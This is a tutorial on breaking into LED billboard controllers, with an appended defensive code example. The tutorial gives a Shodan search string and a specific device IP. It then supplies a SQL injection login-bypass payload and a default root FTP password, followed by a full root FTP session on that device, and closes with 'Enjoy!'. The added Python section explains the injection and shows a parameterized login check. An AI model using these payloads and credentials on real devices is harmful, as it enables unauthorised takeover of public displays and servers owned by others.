- How to Hack Billboards
- Step 1. Register on Shodan
- Step 2. Look up: title:"lednet live system"
- You'll find some!
- Example: 186.206.188.175:8060/en/main.html
- How to hack it? Well, the username parameter is vulnerable to SQL injection.
- So to login, paste
- -1558" OR 9005=9005 AND "UxGI"="UxGI
- in the username parameter and anything in the password input. Now click login!
- Another vulnerability is a default password. You can basically get root FTP access to all of these billboards.
- Username: root
- Password: 111111
- $ ftp 186.206.188.175
- Connected to 186.206.188.175.
- 220 Welcome to blah FTP service.
- Name ( 186.206.188.175): root
- 331 Please specify the password.
- Password:
- 230 Login successful.
- Remote system type is UNIX.
- Using binary mode to transfer files.
- ftp> cd /
- 250 Directory successfully changed.
- ftp> ls
- 229 Entering Extended Passive Mode (|||41314|).
- 150 Here comes the directory listing.
- drwxr-xr-x 1 0 0 1464 Jan 01 1970 bin
- lrwxrwxrwx 1 0 0 21 Jan 01 1970 c: -> /usr/local/playdata/c
- lrwxrwxrwx 1 0 0 21 Jan 01 1970 d: -> /usr/local/playdata/d
- drwxr-xr-x 7 0 0 0 May 21 18:08 dev
- lrwxrwxrwx 1 0 0 21 Jan 01 1970 e: -> /usr/local/playdata/e
- drwxr-xr-x 1 0 0 748 Jan 01 1970 etc
- lrwxrwxrwx 1 0 0 21 Jan 01 1970 f: -> /usr/local/playdata/f
- drwxr-xr-x 1 0 0 36 Jan 01 1970 home
- drwxr-xr-x 1 0 0 1868 Jan 01 1970 lib
- lrwxrwxrwx 1 0 0 11 Jan 01 1970 linuxrc -> bin/busybox
- drwxr-xr-x 1 0 0 32 Jan 01 1970 mnt
- drwxr-xr-x 1 0 0 0 Jan 01 1970 opt
- dr-xr-xr-x 51 0 0 0 Jan 01 1970 proc
- drwxr-xr-x 1 0 0 116 Jan 01 1970 root
- drwxr-xr-x 1 0 0 1332 Jan 01 1970 sbin
- drwxr-xr-x 12 0 0 0 Jan 01 1970 sys
- drwxrwxrwt 6 0 0 720 May 21 18:16 tmp
- drwxr-xr-x 1 0 0 108 Jan 01 1970 usr
- drwxr-xr-x 3 0 0 672 Jan 01 1970 var
- drwxr-xr-x 4 0 0 288 Jan 01 1970 www
- 226 Directory send OK.
- ftp>
- You now have access to the entire server ;)
- Enjoy!
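
Defender's view of the login bug described above, as an added example that is not part of the original paste and not the vendor's code. It assumes the login form splices the username into a double-quoted SQL string (the backend is not shown on the page) and shows a parameterized check that treats the pasted string as an ordinary, nonexistent username; the table, column and account names are hypothetical.

```python
import hashlib
import hmac
import os
import sqlite3

# The string the page pastes into the username field.
PAGE_PAYLOAD = '-1558" OR 9005=9005 AND "UxGI"="UxGI'


def concatenated_query(username):
    """Vulnerable pattern (assumed): user input spliced inside double quotes."""
    return 'SELECT pw_salt, pw_hash FROM users WHERE username = "' + username + '"'


def _hash(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def make_db():
    """In-memory stand-in for the controller's account store (constructed data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY, pw_salt BLOB, pw_hash BLOB)")
    salt = os.urandom(16)
    db.execute("INSERT INTO users VALUES (?, ?, ?)",
               ("operator", salt, _hash("constructed-sample-passphrase", salt)))
    return db


def login(db, username, password):
    """Hardened check: the username is bound as data, never parsed as SQL."""
    row = db.execute("SELECT pw_salt, pw_hash FROM users WHERE username = ?",
                     (username,)).fetchone()
    if row is None:
        # Spend the same hashing cost so unknown users are not faster to reject.
        _hash(password, b"\x00" * 16)
        return False
    salt, stored = row
    return hmac.compare_digest(_hash(password, salt), stored)


if __name__ == "__main__":
    db = make_db()
    # With concatenation the quote in the input closes the string early and
    # the OR clause becomes part of the WHERE condition.
    print(concatenated_query(PAGE_PAYLOAD))
    print(login(db, PAGE_PAYLOAD, "anything"))                     # False
    print(login(db, "operator", "constructed-sample-passphrase"))  # True
```

The default FTP password is a separate problem that query binding does not touch: it needs the factory credential changed or the service disabled on the device.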